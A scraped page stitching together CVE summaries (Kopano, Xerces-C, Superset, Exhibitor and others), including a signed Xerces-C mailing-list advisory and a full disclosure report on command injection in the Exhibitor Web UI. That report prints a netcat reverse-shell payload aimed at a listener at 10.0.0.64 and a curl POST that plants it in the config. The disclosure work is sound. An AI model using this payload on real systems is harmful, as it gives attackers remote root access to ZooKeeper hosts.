HrAddFBBlock in libfreebusy/freebusyutil.cpp in Kopano Groupware Core before 8.7.7 allows out-of-bounds access, as demonstrated by mishandling of an array copy during parsing of ICal data.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Overview
*   Repositories
*   Packages
*   People

**Pinned**

1.  Read-only mirror of Kopano Core git repo
    
    C++ 50 29
    

3.  Read-only mirror of the Kopano WebApp git repo
    
    JavaScript 19 22
    
4.  Material from the Kopano workshop at the 2021 Univention Summit
    
    Shell 1
    

**Repositories**

Type

Select type

All Public Sources Forks Archived Mirrors Templates

Language

Select language

All C# C++ Go HTML JavaScript PHP Python Shell TypeScript

Sort

Select order

Last updated Name Stars

*   kcc-go Public
    
    This implements a minimal client interfacing with a couple of SOAP methods of a Kopano server.
    
    Go 0 Apache-2.0
    
    3 0 3
    
    Updated Mar 4, 2023
    
*   kopano-webapp Public
    
    Read-only mirror of the Kopano WebApp git repo
    
    JavaScript
    
    19 22 0 5
    
    Updated Mar 2, 2023
    
*   oidc-go Public
    
    Oidc-go is a Go package to provide common helpers to interface with OpenID Connect servers.
    
    Go
    
    2
    
    Apache-2.0
    
    1 0 1
    
    Updated Feb 25, 2023
    
*   kwmserver Public
    
    Kopano Web Meetings Server implements the signaling/channelling server for Kopano Web Meetings
    
    Go
    
    5 3 1 3
    
    Updated Feb 24, 2023
    
*   libkcoidc Public
    
    This project implements a C shared library with a public API to validate Kopano Konnect tokens (JSON Web Tokens).
    
    Go 0 0
    
    2 2
    
    Updated Feb 24, 2023
    
*   kapi Public
    
    Kopano API provides a web service with the endpoints to interface with Kopano via HTTP APIs.
    
    Go
    
    3
    
    0
    
    0 1
    
    Updated Feb 15, 2023
    
*   pubsjs Public
    
    Kopano API Pubs Client Library (pubsjs)
    
    TypeScript 0 MIT 0
    
    0 16
    
    Updated Jan 7, 2023
    
*   kwmjs Public
    
    Kopano Web Meetings Client Library (kwmjs)
    
    TypeScript
    
    1
    
    MIT 0
    
    0 11
    
    Updated Jan 7, 2023
    
*   kpop Public
    
    Kpop is a collection of React UI components and UI uitilites for Kopano Web apps
    
    JavaScript 0 Apache-2.0
    
    1 0 17
    
    Updated Dec 10, 2022
    
*   meet Public
    
    A PWA for doing video meetings
    

**Most used topics**

CVE-2019-19907: Kopano

The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been addressed in the maintained version of the library and has no current mitigation other than to disable DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable.

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 
**List:       xerces-c-users
Subject:    Xerces-C Security Advisory \[CVE-2018-1311\]
From:       "Cantor, Scott" <cantor.2 () osu ! edu>
Date:       2019-12-16 23:19:48
Message-ID: 66B4F0F4-7968-442B-89D7-4A7A6305B3ED () osu ! edu
\[Download RAW message or body\]**

The below advisory is being publically announced at the request of the Apache \\
security team as a result of it having gone unfixed for over a year, with no \\
volunteer at present to work on the bug.

I have publically posted the advisory at the referenced URL, and updated the advisory \\
page on the website to reflect the status of the issue. I have also filed a public \\
JIRA issue regarding the bug, XERCESC-2188.

Future unfixed issues will be posted in the same manner if the chance of a fix is \\
deemed unlikely by the PMC after a reasonable amount of time.

Scott Cantor
cantor.2@osu.edu
Enterprise Security
The Ohio State University
 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

CVE-2018-1311: Apache Xerces-C use-after-free vulnerability processing external DTD

Severity: High

Vendor: The Apache Software Foundation

Versions Affected: Apache Xerces-C XML Parser library (all known versions)

Description: The Xerces-C XML parser contains a use-after-free error
triggered during the scanning of external DTDs.

The bug allows for a denial of service attack in applications that allow
external DTD processing and do not prevent external DTD usage, and could
conceivably result in remote code execution if the heap were groomed.

Mitigation: This flaw has not been addressed in the maintained version
of the library and has no current mitigation other than to disable DTD
processing. This can be accomplished via the DOM using a standard parser
feature, or via SAX using the XERCES\_DISABLE\_DTD environment variable.

Applications should strongly consider blocking remote entity resolution
and/or disabling of DTD processing in light of the continued
identification of bugs in this area of the library.

Credit: This issue was reported by the UK's National Cyber Security
Centre (NCSC).

References:
http://xerces.apache.org/xerces-c/secadv/CVE-2018-1311.txt

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE3KoVAHvtneaQzZUjN4uEVAIneWIFAl34DFIACgkQN4uEVAIn
eWIbtQ/9Gv7gURR24J5yx+R69O4bnGsgHPaHea7VWh4bs4H/mYli3ewZBwzkuTz1
+Ib6RN8QXT9FA4+TVBCQua2/EBlpnpNMHPp6+GDWISrPYworJGV9FDrCDfqB+BR2
Li68pH/wlFgqCLMsdUSm7lKU9n+rflW8kx3AsqBlggcrfGTh7XJaImHelOXuRqw/
QumnckDQQkEgPHxGVE5h2uYvwj1HsyU/czqqWVAHC1rzdXI9syGGOO9xoNCjB70d
rMi+XEDTuyzqY6SIjM1NLbFyX8cs9CDM4IhQeG+XNQUE9VnvLu1dHY/IqvS9jDrO
HD4J0ID/rnbxSou3BTaMKGr/TkJHanniZhXJxZujDI7ksEbMBemB7ROwCcQLQ8Z8
B3QKfCQwjIGmBMaDafElyrbIp74+Vpq3eY6itFOGCQE7f+rXu3qxEk5njsdBsJYV
s47v9f0v65O0FE5l7yPi3zhkonCfHaMTw08SboY2YqWJf9A1YJZOs1PF1SNU+D/p
rM2ydwP5F9OPlwm/uLCfRd+hl2etM0UJBcL1V/tP0ORoEZUF1+ZEZckDQ9Cnr2eY
6Dgd+dmTk5nxjPmsQZPHb4QXsQHbq1HCU5/oJug56SatJ0H0ffj48XXjd1UlBEIk
v5Eo3+ahPxXBuSgc77naLcisSy3H3+qL6VDMpq6qK1IC/PXvaz0=
=zDeT
-----END PGP SIGNATURE-----

**\[prev in list\] \[next in list\] \[prev in thread\] \[next in thread\]** 

  

Configure | About | News | Add a list | Sponsored by KoreLogic

CVE-2018-1311: 'Xerces-C Security Advisory [CVE-2018-1311]' - MARC

An issue existed in the drawing of web page elements. The issue was addressed with improved logic. This issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Visiting a maliciously crafted website may reveal browsing history.

CVE-2019-8769: About the security content of macOS Catalina 10.15

In Apache Incubator Superset before 0.31 user could query database metadata information from a database he has no access to, by using a specially crafted complex query.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2019-12413

In Apache Incubator Superset before 0.32, a user can view database names that he has no access to on a dropdown list in SQLLab

CVE-2019-12414

Zoho ManageEngine Applications Manager before 13640 allows a remote authenticated SQL injection via the Agent servlet agentid parameter to the Agent.java process function.

CVE-2019-19650: Release Notes - New features

An issue was discovered on Weidmueller IE-SW-VL05M 3.6.6 Build 16102415, IE-SW-VL08MT 3.5.2 Build 16102415, and IE-SW-PL10M 3.3.16 Build 16102416 devices. Sensitive Credentials data is transmitted in cleartext.

Several vulnerabilities have been discovered in the Expat XML parser library (aka libexpat).  
This open-source component is widely used in a lot of products worldwide.  
A remote, anonymous attacker could use an integer overflow to execute arbitrary program code when loading specially crafted XML files.

Profinet SDK is using XML parser library Expat as reference solution for loading the XML based Profinet network configuration files (IPPNIO or TIC).

  

Possible memory corruption in BT controller when it receives an oversized LMP packet over 2-DH1 link and leads to denial of service.

  

SharpZipLib (or #ziplib) is a Zip, GZip, Tar and BZip2 library. Prior to version 1.3.3, a TAR file entry ../evil.txt may be extracted in the parent directory of destFolder. This leads to arbitrary file write that may lead to code execution. The vulnerability was fixed in SharpZipLib version 1.3.3.

  

The Web-Based Management (WBM) of WAGOs programmable logic controller (PLC) is typically used for administration, commissioning and updates.  
Various configuration pages of the device are vulnerable to reflected XSS (Cross-Site Scripting) attacks.

  

By tricking clients of the mentioned products into contacting malicious OPC UA servers and thereby acting as OPC UA clients, a crash of the component can be provoked.

  

A vulnerability is reported in WIBU-SYSTEMS Codemeter. WIBU-SYSTEMS Codemeter is installed by default during e!COCKPIT and WAGO-I/O-Pro (CODESYS 2.3) installations. All currently existing e!COCKPIT installation bundles and WAGO-I/O-Pro (CODESYS 2.3) installation bundles are affected with vulnerable versions of WIBU-SYSTEMS Codemeter.

  

The user management of the FL SWITCH 2xxx family of devices implements access rights based on roles and permission groups. An unprivileged user logged in via the SSH CLI is assigned to the admin role independent of his configured access role enabling full access to the device configuration (CWE-266 - Incorrect Privilege Assignment).

User Management via SSH was first introduced with firmware version 3.00. Firmware versions other than 3.00 are not affected by this vulnerability.

  

Apache log4net versions before 2.0.10 do not disable XML external entities when parsing log4net configuration files. This allows for XXE-based attacks in applications that accept attacker-controlled log4net configuration files.

CVE-2019-16672: Advisories | CERT@VDE

Unbound 1.6.4 through 1.9.4 contain a vulnerability in the ipsec module that can cause shell code execution after receiving a specially crafted answer. This issue can only be triggered if unbound was compiled with `--enable-ipsecmod` support, and ipsecmod is enabled and used in the configuration.

CVE-2019-18934: unbound/Changelog at release-1.9.5 · NLnetLabs/unbound

Apache Shiro before 1.4.2, when using the default "remember me" configuration, cookies could be susceptible to a padding attack.

CVE-2019-12422

An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.

**Summary**

An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.

**Tested Versions**

Tested version was compiled using the standalone pom.xml from the Exhibitor master branch.

(Note that the latest released version is labeled 1.7.1, but the version in the exhibitor-standalone’s pom.xml is set to 1.6.0.)

The vulnerability should affect all versions at least as far back as 1.0.9, when the javaEnvironment variable was added.

**Product URLs**

https://github.com/soabase/exhibitor

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command

**Details**

Exhibitor is a ZooKeeper supervisory process, which is described in the ZooKeeper documentation.

Since the ZooKeeper server will exit on an error, the Apache ZooKeeper documentation suggests a supervisory process that manages the ZooKeeper server process, mainly for the purpose of restarting ZooKeeper when it exits.

Exhibitor’s Web UI does not have any form of authentication, and prior to version 1.7.0, did not have any way to specify which interfaces to listen on. Exposing Exhibitor is dangerous for the ZooKeeper ensemble because Exhibitor allows the changing of the ZooKeeper configuration, and also provides a UI for viewing and modifying keys and values stored in ZooKeeper.

By default, the Exhibitor Web UI listens on TCP 8080. However, since this port is commonly used, it may be common to find it on other ports as well.

Under the Config tab in the Exhibitor Web UI, the “java.env script” field can be modified and the new configuration pushed to ZooKeeper. Exhibitor launches ZooKeeper through a script, and the contents of this field are passed, unmodified, as arguments to the Java command to launch ZooKeeper, which can be seen here.

(The contents of the “java.env script” field are passed in as $JVMFLAGS.)

Based on how this argument is passed, there are several ways to execute arbitrary commands. The methods tested were surrounding the command with backticks and using $(), for example:

$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)

This example uses netcat to open a reverse shell to a listener on 10.0.0.64:4444.

In the example, ZooKeeper will still launch successfully after the command executes, and it will run the command every time ZooKeeper is re-launched by Exhibitor.

**Exploit Proof of Concept**

The included screenshots show the process of obtaining a root shell on the system.

The steps to exploit it from a web browser:

1.  Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON
2.  In the “java.env script” field, enter any command surrounded by $() or \`\`, for example, for a simple reverse shell:
    
    $(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
    
3.  Click Commit > All At Once > OK
4.  The command may take up to a minute to execute.

It can also be performed with a single curl command:

command: curl -X POST -d @data.json http://10.0.0.200:8080/exhibitor/v1/config/set

data.json: { “zookeeperInstallDirectory”: “/opt/zookeeper”, “zookeeperDataDirectory”: “/opt/zookeeper/snapshots”, “zookeeperLogDirectory”: “/opt/zookeeper/transactions”, “logIndexDirectory”: “/opt/zookeeper/transactions”, “autoManageInstancesSettlingPeriodMs”: “0”, “autoManageInstancesFixedEnsembleSize”: “0”, “autoManageInstancesApplyAllAtOnce”: “1”, “observerThreshold”: “0”, “serversSpec”: “1:exhibitor-demo”, “javaEnvironment”: “$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)”, “log4jProperties”: “”, “clientPort”: “2181”, “connectPort”: “2888”, “electionPort”: “3888”, “checkMs”: “30000”, “cleanupPeriodMs”: “300000”, “cleanupMaxFiles”: “20”, “backupPeriodMs”: “600000”, “backupMaxStoreMs”: “21600000”, “autoManageInstances”: “1”, “zooCfgExtra”: { “tickTime”: “2000”, “initLimit”: “10”, “syncLimit”: “5”, “quorumListenOnAllIPs”: “true” }, “backupExtra”: { “directory”: “” }, “serverId”: 1 }

**Mitigation**

Since Exhibitor has no built-in authentication, it would be helpful to limit the interfaces it listens on to only trusted networks, or require authentication using something like an nginx reverse proxy and block all other access using firewall rules.

If the features provided by the Exhibitor Web UI are not needed and the only needed functionality is managing the ZooKeeper process, it should be replaced with a simpler ZooKeeper supervisor solution, such as a systemd service.

**Timeline**

2019-03-08 - Vendor Disclosure  
2019-05-01 - GitHub issue #389 created; Vendor advised point of contact changed. Copy of report sent to new point of contact  
2019-05-14 - (75 day) 3rd follow up with vendor  
2019-05-29 - Final notice of public disclosure release  
2019-11-13 - Public Release

Discovered by Logan Sanderson of Cisco ASIG.

Tag

#apache